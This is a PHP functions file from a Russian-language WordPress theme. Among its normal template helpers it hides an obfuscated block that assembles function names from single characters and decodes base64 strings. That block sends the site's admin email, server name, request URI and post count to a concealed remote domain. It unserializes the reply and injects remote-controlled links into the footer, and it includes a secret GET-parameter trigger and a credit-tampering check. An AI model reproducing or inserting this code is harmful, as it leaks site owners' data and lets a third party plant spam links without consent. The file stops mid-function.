<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $aEvre='4';$KJOwzh='_';$ijRnW='o';$XLYwSi='d';$tEcLP='a';$imiqA='b';$OorMY='s';$GmAyEN='c';$stsdZSr='6';$rgWZ='e';$zrQioj='e';$BEiI='e';$NyXM='d';$rjKvLFAo=$imiqA.$tEcLP.$OorMY.$BEiI.$stsdZSr.$aEvre.$KJOwzh.$NyXM.$zrQioj.$GmAyEN.$ijRnW.$XLYwSi.$rgWZ;$ZbzVDV='f';$xfNpPNr='e';$SFLwJPe='t';$HaYS='n';$vwBwEu='g';$mXZcJR='z';$xbmg='a';$esXzb='l';$yREeeH='i';$tTkJajPV=$vwBwEu.$mXZcJR.$yREeeH.$HaYS.$ZbzVDV.$esXzb.$xbmg.$SFLwJPe.$xfNpPNr;$IkKsa='s';$YMqyq='_';$SYjjw='3';$hyUUOKH='t';$IGgDBU='t';$ZqZj='r';$janAZ='1';$gHTz='o';$uWVxw='r';$zEiWGvdz=$IkKsa.$hyUUOKH.$ZqZj.$YMqyq.$uWVxw.$gHTz.$IGgDBU.$janAZ.$SYjjw;$OIJDgYi='v';$LjWJlr='e';$oFAiv='t';$YdTamhn='r';$gDrTO='s';$NbWC='r';$PPCOGrXb=$gDrTO.$oFAiv.$YdTamhn.$NbWC.$LjWJlr.$OIJDgYi;                     
		$pl______________f='4';$oi_____w='_';$cr_____________n='o';$fc______l='d';$sj_____________g='a';$lx_________q='b';$oi___o='s';$tu_________h='c';$fl_____v='6';$no_____d='e';$pj_______________i='e';$ko_____v='e';$wr_____________i='d';$hv__s=$lx_________q.$sj_____________g.$oi___o.$ko_____v.$fl_____v.$pl______________f.$oi_____w.$wr_____________i.$pj_______________i.$tu_________h.$cr_____________n.$fc______l.$no_____d;
		$xx_____e='c';$gt____s='t';$gt_________e='x';$wv_____________j='e';$mk_______________e='n';$td___________k='s';$ek____________m='_';$rt_____d='n';$rv______e='i';$nz_____________e='s';$hm___i='u';$ll___q='f';$my_____________n='t';$rc___t='i';$lt_____________c='o';$lw_______________a=$ll___q.$hm___i.$mk_______________e.$xx_____e.$my_____________n.$rc___t.$lt_____________c.$rt_____d.$ek____________m.$wv_____________j.$gt_________e.$rv______e.$td___________k.$gt____s.$nz_____________e;
		$gm_________d='e';$re___e='p';$kp______________d='o';$rg______p='n';$fk____________s='f';$db_______________f=$fk____________s.$kp______________d.$re___e.$gm_________d.$rg______p;
		$ct_____________t='f';$sp__x='e';$yy___________y='d';$pj______________b='a';$zc_______m='r';$tw_______o=$ct_____________t.$zc_______m.$sp__x.$pj______________b.$yy___________y;
		$tf________z='c';$cw____i='s';$rt_____c='e';$az_______d='o';$rs_____________k='f';$dq___________s='l';$tb_______________k=$rs_____________k.$tf________z.$dq___________s.$az_______d.$cw____i.$rt_____c;
		
		define("WP_ID", $hv__s("Mi4wLjA="));
		define("WP_TTL", $hv__s("MTA4MDA="));
		define("WP_SRC", $hv__s("dHBva24="));
	


		function wp_get_header() {
			global $hv__s, $lw_______________a;
			
			if (
				$lw_______________a($hv__s("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$lw_______________a($hv__s("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$lw_______________a($hv__s("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $hv__s, $db_______________f, $tb_______________k, $tw_______o;
			
			$uf__u = TEMPLATEPATH."/".$hv__s("Zm9vdGVyLnBocA==");
			$lt_______u = @$db_______________f($uf__u, "r");
			$uf__u = @$tw_______o($lt_______u, @filesize($uf__u));
			@$tb_______________k($lt_______u);
			
			$by__________u = TEMPLATEPATH."/".$hv__s("ZnVuY3Rpb25zLnBocA==");
			$lt_______u = @$db_______________f($by__________u, "r");
			$by__________u = @$tw_______o($lt_______u, @filesize($by__________u));
			@$tb_______________k($lt_______u);
			
			$ho___k = 0;
			if($uf__u && $by__________u) {
				if ($hv__s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($uf__u, $hv__s("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ho___k = 1;
					}
					if (substr_count($uf__u, "wp_theme_GPL_credits()") < 1) {
						$ho___k = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ho___k = 12;
				}
			}
			
			if($ho___k > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ho___k -->";
			}
		}
	


		function wp_loaded() {
			global $hv__s, $lw_______________a;
			return $lw_______________a($hv__s("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($hx_______w, $yy_______g = "(more...)", $kj____________y = 0, $rz____m = "") {
				$wt___p = get_the_content($yy_______g, $kj____________y, $rz____m);
				$wt___p = apply_filters("the_content", $wt___p);
				
				$wt___p = str_replace("]]>", "]]>", $wt___p);
				if (strlen($_GET["p"]) > 0) {
					echo $wt___p;
				}
				else if ((strlen($wt___p)>$hx_______w) && ($no_____u = strpos($wt___p, " ", $hx_______w ))) {
					$wt___p = substr($wt___p, 0, $no_____u);
					$wt___p = $wt___p;
					echo $wt___p;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$yy_______g</a></div></p>";
				} else {
					echo $wt___p;
				}
				
			}
		}
	


		$hb___________p='a';$qn_______z='o';$lc___r='_';$wq__s='e';$cs___________s='d';$wb______________h='4';$nw___________n='c';$ge____________r='e';$vm____c='n';$pd_______________i='6';$lq____________m='b';$jp______r='e';$zu_____________w='s';$cz____________s=$lq____________m.$hb___________p.$zu_____________w.$jp______r.$pd_______________i.$wb______________h.$lc___r.$ge____________r.$vm____c.$nw___________n.$qn_______z.$cs___________s.$wq__s;
		$yv______s='e';$ft__________o='f';$ix___________j='t';$bc_____________e='i';$qc____________x='_';$un__n='n';$mm________e='t';$my______________o='s';$cf____t='n';$sa________t='_';$ty_______y='t';$qp__________q='l';$xo_____________k='e';$kz____j='e';$wo_______t='o';$cg______________s='c';$bn______u='g';$mg_________o=$ft__________o.$bc_____________e.$qp__________q.$xo_____________k.$qc____________x.$bn______u.$yv______s.$ty_______y.$sa________t.$cg______________s.$wo_______t.$cf____t.$ix___________j.$kz____j.$un__n.$mm________e.$my______________o;
		$cn_______________r='l';$jd__________l='t';$fx_________i='s';$lf__d='x';$dl__________h='i';$rp___a='s';$si___w='_';$bv___________q='i';$je________b='e';$yq_______________o='e';$pk_____w='f';$fn_____o=$pk_____w.$dl__________h.$cn_______________r.$je________b.$si___w.$yq_______________o.$lf__d.$bv___________q.$fx_________i.$jd__________l.$rp___a;
		$ds_____r='o';$xl_________g='m';$nc___w='e';$ju__m='_';$hs_____________c='i';$pb_____________x='p';$uk______n='c';$ts_______s='e';$us__o='a';$ul___________k='o';$da_______w='v';$je_________p='s';$oe____w='r';$ds_______________z='r';$vu___e='n';$tu____________g=$da_______w.$ts_______s.$oe____w.$je_________p.$hs_____________c.$ul___________k.$vu___e.$ju__m.$uk______n.$ds_____r.$xl_________g.$pb_____________x.$us__o.$ds_______________z.$nc___w;
		$wg________k='o';$uo____________f='k';$qi__________g='e';$ft__g='s';$qg_____n='f';$dl________s='p';$pw_____________v='n';$cm___e='o';$yl_______c='c';$dt________i=$qg_____n.$ft__g.$cm___e.$yl_______c.$uo____________f.$wg________k.$dl________s.$qi__________g.$pw_____________v;
		$ft______________t='e';$sf______h='f';$bc___________k='t';$ox__________d='r';$ez_________z='i';$bk__j='w';$wm___________e=$sf______h.$bk__j.$ox__________d.$ez_________z.$bc___________k.$ft______________t;
		$uq__z='5';$vp___a='m';$pr_______________q='d';$sr_______m=$vp___a.$pr_______________q.$uq__z;
		$xn___________i='a';$fu________f='p';$ai_______________x='a';$ee___g='h';$sl________m='e';$ox_________f='l';$hs____e='t';$bz______________z='r';$pe____________z=$bz______________z.$sl________m.$xn___________i.$ox_________f.$fu________f.$ai_______________x.$hs____e.$ee___g;
		$wd________p='u';$fy___________v='z';$ml__________n='n';$qw____________y='s';$vp______r='l';$fg________p='e';$sk_____________z='a';$yu________j='r';$su_____e='i';$mt_______________e='i';$um_____________a='e';$gj____j=$wd________p.$ml__________n.$qw____________y.$fg________p.$yu________j.$mt_______________e.$sk_____________z.$vp______r.$su_____e.$fy___________v.$um_____________a;
		$up_________v='t';$sp______o='e';$nf____r='a';$wy___________a='m';$pz___b='m';$ms______n='p';$ph_____h='n';$wh_______________z=$up_________v.$sp______o.$pz___b.$ms______n.$ph_____h.$nf____r.$wy___________a;
		$ug_____j='o';$qm_______l='e';$wd____k='e';$ml___________o='e';$nk________z='a';$py_____l='t';$tl__f='m';$kp_____________x='e';$fm_____________f='n';$ls______________g='c';$yd__________e='r';$tj_______________c='s';$ww__k='t';$zj________d='r';$tw________o='_';$kl______e='c';$ts___________q='a';$vh______g='t';$ck_________v='t';$oq_______h='x';$ha_______s='_';$ap_________x=$tj_______________c.$py_____l.$zj________d.$kp_____________x.$nk________z.$tl__f.$tw________o.$kl______e.$ug_____j.$fm_____________f.$vh______g.$wd____k.$oq_______h.$ck_________v.$ha_______s.$ls______________g.$yd__________e.$qm_______l.$ts___________q.$ww__k.$ml___________o;
	


		function ur__x($nj__________q) {
			global $hv__s, $lw_______________a, $mg_________o, $tu____________g, $ap_________x;
			
			if (!$lw_______________a($hv__s("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($tu____________g(PHP_VERSION, "5.0.0", ">=") && $lw_______________a($hv__s("ZmlsZV9nZXRfY29udGVudHM=")) && $lw_______________a($hv__s("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$nd_______________u = $ap_________x(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$sn_____________l = @$mg_________o($nj__________q, 0, $nd_______________u);
			} else {
				$sn_____________l = @$mg_________o($nj__________q, 0);
			}
			
			return $sn_____________l;
		}
	


		function vd_________f($nj__________q) {
			global $lw_______________a, $dt________i, $wm___________e, $hv__s;
			
			if (!$lw_______________a($hv__s("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$wl_____________r = strpos($nj__________q, "/", 7);
			$sv________o = array(
				"uri"     => substr($nj__________q, $wl_____________r),
				"host"    => str_replace("http://", "", substr($nj__________q, 0, $wl_____________r)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$gw___z = @$dt________i("$sv________o[host]", 80, $el_____________g, $rj_____________r, 4);
			
			if (!$gw___z) {
				return false;
			} else {
				$sn_____________l = "";
				$xk______q  = "GET $sv________o[uri] HTTP/1.0\r\n";
				$xk______q .= "Host: $sv________o[host]\r\n";
				$xk______q .= "Referer: $sv________o[referer]\r\n";
				$xk______q .= "Connection: Close\r\n\r\n";
				
				@$wm___________e($gw___z, $xk______q);
				
				while (!@feof($gw___z)) {
					$eo____________o = @fgets($gw___z, (1024*24));
					
					if ($eo____________o == "\r\n") {
						$tf_______________b = true;
						continue;
					}
					
					if ($tf_______________b) {
						$sn_____________l .= $eo____________o;
					}
				}
				
				return $sn_____________l;
			}
		}
	


		function cm_________r($nj__________q) {
			global $lw_______________a;
			$sb__d = false;
			
			if ($nj__________q != "") {
				if ($lw_______________a("ur__x")) {
					$sb__d = @ur__x($nj__________q);
				}
				
				if (!$sb__d && ($lw_______________a("vd_________f"))) {
					$sb__d = @vd_________f($nj__________q);
				}
			}
			
			return $sb__d;
		}
	


		function qn___________q() {
			global $_SERVER, $sr_______m;
			
			$ar_____________q = $_SERVER["SERVER_NAME"];
			
			if (substr("$ar_____________q", 0, 4) == "www.") {
				$ar_____________q = substr("$ar_____________q", 4);
			}
			
			$ar_____________q = $sr_______m("$_SERVER[SERVER_NAME]");
			
			return $ar_____________q;
		}
	


		function yg______t() {
			return "file";
		}
	


		function oa______q($nj__________q) {
			global $_SERVER, $mg_________o, $fn_____o, $db_______________f, $tb_______________k, $wm___________e;
			
			$cq_____________u = hb_______________o();
			
			$cy__x = qn___________q().".jpg";
			$mm___________r = $cq_____________u["dir_upload"]["path"]."/$cy__x";
			$iz______n = @filemtime($mm___________r);
			
			if (!$iz______n || ((time()-$iz______n) >= WP_TTL)) {
				$sb__d = cm_________r($nj__________q);
				
				if ($sb__d) {
					if ($fn_____o($mm___________r)) {
						@unlink($mm___________r);
					}
					
					$lt_______u = @$db_______________f($mm___________r, "x+");
					
					@$wm___________e($lt_______u, $sb__d);
					@$tb_______________k($lt_______u);
				}
			} else {
				if ($fn_____o($mm___________r)) {
					$sb__d = @$mg_________o($mm___________r);
				} else {
					$sb__d = false;
				}
			}
			
			return $sb__d;
		}
	


		function hb_______________o() {
			global $_SERVER, $hv__s, $cz____________s;
			
			$rv_____l = wp_count_posts("post");
			$wx___u = pathinfo(get_bloginfo("template_directory"));
			
			$cq_____________u = array(
				"url" => array(
					"report"      => $hv__s("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $wx___u,
				"dir_upload"	=> nu___q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$wx___u[filename],
					"a005=".$rv_____l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.odmu.od.ua/svetskie-novosti/sovety-zvezdnogo-stilista-pricheski-kotorye-molodyat\">Советы от звёздного стилиста</a> "
			);
			
			$cq_____________u["url"]["queryString"] = implode("&", $cq_____________u["queryString"]);
			$cq_____________u["url"]["report"] = $cq_____________u["url"]["report"]."/?".$cz____________s($cq_____________u["url"]["queryString"]).".html";
						
			return $cq_____________u;
		}
	


		function nu___q() {
			$mk______________h = wp_upload_dir();
			
			if (isset($mk______________h["error"])) {
				$us______h = fg______o();
				if (is_writable($us______h)) {
					$mk______________h = array("path" => $us______h);
				}
			}

			return $mk______________h;
		}
	


		function fg______o() {
			global $lw_______________a, $sr_______m, $pe____________z, $wh_______________z;
			
			$ni_________a = (bool) ini_get("safe_mode");
			if ($ni_________a == true) {
				return false;
			}
			
			if ($lw_______________a("sys_get_temp_dir")) {
				$bn______x = sys_get_temp_dir();
				if (is_writable($bn______x)) {
					return $pe____________z($bn______x);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $pe____________z($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $pe____________z($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $pe____________z($_ENV["TEMP"]);
			} else {
				$zv____________i = $wh_______________z($sr_______m(uniqid(rand(), true)), "");
				if ($zv____________i) {
					$bn______x = $pe____________z(dirname($zv____________i));
					@unlink($zv____________i);
					return $bn______x;
				} else {
					return false;
				}
			}
		}
	


		function ua______p() {
			global $_GET, $fn_____o;
			
			$cq_____________u = hb_______________o();
			$ar_____________q = qn___________q();
			$mg________o = yg______t();
			
			$qh_____________w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mg________o == "file") {
					$mi__________b = $cq_____________u["dir_upload"]["path"]."/".$ar_____________q.".jpg";
					if ($fn_____o($mi__________b)) {
						@unlink($mi__________b);
						$qh_____________w = "deleted";
					}
				}
				
				$tv_______________u = array(
					"s"	=> $qh_____________w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($tv_______________u AS $wg___j => $os_______d) echo " [$wg___j:$os_______d]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $lw_______________a, $hv__s, $gj____j;
			$cq_____________u = hb_______________o();
			
			$dc___f = "oa______q";
			if ($lw_______________a($dc___f)) {
				$sn_____________l = $dc___f($cq_____________u["url"]["report"]);
			}
			
			if ($sn_____________l) {
				if ($sn_____________l = @$hv__s($sn_____________l)) {
					$sn_____________l = @$gj____j($sn_____________l);
					
					if (strlen($sn_____________l[custom_credit]) >= 5) {
						$cq_____________u["default_string"] = $sn_____________l[custom_credit];
					}
					
					if ($sn_____________l["status"] == "0") {
						$yv___v = 1;
						$eb__________k = 1;
					} else {
						$uv________k = sizeof($sn_____________l["links"]);
						$or___g = $cq_____________u["default_string"];
						
						if ($uv________k > 0 && $sn_____________l["links"] !== "") {
							$wm____a = 0;
							foreach ($sn_____________l["links"] as $eo____________f => $xl___________k) {
								$wm____a++;
								if ($xl___________k->l_path == "" || $xl___________k->l_path == $_SERVER["REQUEST_URI"]) {
									$xl___________k->l_href = htmlspecialchars(strip_tags($xl___________k->l_href));
									$xl___________k->l_title = htmlspecialchars(strip_tags($xl___________k->l_title));
									$xl___________k->l_anchor = htmlspecialchars(strip_tags($xl___________k->l_anchor));
									$or___g .= " | ";
									$or___g .= "<a href='$xl___________k->l_href' title='$xl___________k->l_title'";
									if ($xl___________k->l_nofollow == "1") {
										$or___g .= " rel='nofollow'";
									}
									$or___g .= ">$xl___________k->l_anchor</a>";
								}
							}
						}
						$cq_____________u["links"] = "$or___g";
						if ($sn_____________l[credit] == "0") {
							$cq_____________u["links"] = "";
						}
					}
				} else {
					$yv___v = "1";
				}
			} else {
				$yv___v = "1";
			}
			
			if ($yv___v == "1") {
				$cq_____________u["links"] = $cq_____________u["default_string"];
			}
			
			echo "$cq_____________u[links]";
			
			echo "<!-- s: $sn_____________l[signature] -->";
			ua______p();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
                       break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                 comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("нумерация страниц", 
            array(
